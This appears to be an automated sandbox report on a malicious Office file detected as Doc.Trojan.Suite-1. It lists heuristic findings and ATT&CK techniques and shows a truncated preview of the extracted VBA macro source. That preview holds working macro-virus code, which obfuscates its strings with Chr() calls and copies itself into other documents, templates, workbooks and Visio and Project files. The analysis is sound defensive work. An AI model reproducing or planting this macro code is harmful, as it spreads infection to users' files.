MALICIOUS
280
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The file is an Office document containing VBA macros. Heuristics indicate the use of Shell() and CreateObject() calls, common for executing malicious code. The macros appear to be designed to copy themselves to other projects and potentially download additional payloads, as suggested by the ClamAV detection 'Doc.Trojan.Suite-1'.
Heuristics 5
-
ClamAV: Doc.Trojan.Suite-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Suite-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 46828 bytes |
SHA-256: 0c3889ff85e4bb8bdf8246f1d2a909e2d5bb85775ff2c5893b338144693e5540 |
|||
|
Detection
ClamAV:
Doc.Trojan.Suite-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "List1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "List2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "List3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Modul 1"
Sub Document_Close()
'
mut$ = "Visio.Application": mat$ = "Blank Drawing.vst": dovis = 1
On Error Resume Next
t = Application
If t = Chr(78) + Chr(111) + Chr(116) + Chr(104) + Chr(105) + Chr(110) + Chr(103) Then GoTo nopro
If t = "Microsoft Project" Then
mook = Version
If mook = "8.0" Then
'
End If
Application.DisplayAlerts = False
'
For Each Z In Projects
On Error Resume Next
Set ap = Z.VBProject.VBComponents(1).codemodule
Set tp = ThisProject.VBProject.VBComponents(1).codemodule
If ap.Lines(2, 1) <> "'" Then
ap.DeleteLines 1, ap.countoflines
ap.InsertLines 1, tp.Lines(1, tp.countoflines)
'
End If
Next Z
Set temp = Application.VBE.VBProjects(1).VBComponents(1).codemodule
If temp.Lines(2, 1) <> Chr(39) Then
temp.DeleteLines 1, temp.countoflines
temp.InsertLines 1, tp.Lines(1, tp.countoflines)
End If
End If
vi:
te$ = t: tune = Left(te$, 5)
If tune <> Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) Then
Set nom = ThisDocument.VBProject.VBComponents(1).codemodule
For i = 1 To Documents.Count
Set docobj = Documents.Item(i)
Set gets = docobj.VBProject.VBComponents(1).codemodule
If gets.Lines(2, 1) <> Chr(39) Then
gets.InsertLines 1, nom.Lines(1, nom.countoflines)
dname = CurDir & "\": filechk$ = (dname & docobj)
mystr = Right(filechk$, 4): If mystr <> ".vsd" Then sd = 0
mystr = Right(filechk$, 4): If mystr <> ".vss" Then sd = 0
mystr = Right(filechk$, 4): If mystr <> ".vst" Then sd = 0
If sd = 0 Then fila$ = (dname & docobj & ".vsd")
'
End If
toobig:
Next i
If strTemplatename = "" Then GoTo runaway
'
Set Target = Documents.Open(strTemplatename)
Set targets = Target.VBProject.VBComponents(1).codemodule
If targets.Lines(2, 1) <> "'" Then
If targets.Lines(1, 1) = "Option Explicit" Then Target.DeleteLines 1, 1
targets.InsertLines 1, rnt.Lines(1, rnt.countoflines)
Target.SaveAs strTemplatename
Else
toobigtemplate:
Target.Close
End If
runaway:
End If
If t = Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr(102) + Chr(116) + Chr(32) + Chr(87) + Chr(111) + Chr(114) + Chr(100) Then Else GoTo ex
Options.SendMailAttach = True: m = 1
Set nim = NormalTemplate
Set aiv = ActiveDocument
Set aktiv = aiv.VBProject.VBComponents(m).codemodule
Set nom = nim.VBProject.VBComponents(m).codemodule
If nom.Lines(2, 1) <> "'" Then
nom.DeleteLines 1, nom.countoflines
nom.InsertLines 1, aktiv.Lines(1, aktiv.countoflines)
nom.replaceline 1, Chr(83) + Chr(117) + Chr(98) + Chr(32) + Chr(68) + Chr(111) + Chr(99) + Chr(117) + Chr(109) + Chr(101) + Chr(110) + Chr(116) + Chr(95) + Chr(67) + Chr(108) + Chr(111) + Chr(115) + Chr(101) + Chr(40) + Chr(41)
nop = 1
End If
If aktiv.Lines(2, 1) <> "'" Then
act = 1
End If
ex:
If act = 1 Then GoTo 11
If t = "Microsoft Excel" Then Else GoTo 12
Set a = ActiveWorkbook.VBProject
Set aktiv = a.VBComponents("ThisWorkbook").codemodule
Set nimt = ThisWorkbook.VBProject
Set nom = nimt.VBComponents("ThisWorkbook").codemodule
11:
If aktiv.Lines(2, 1) <
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.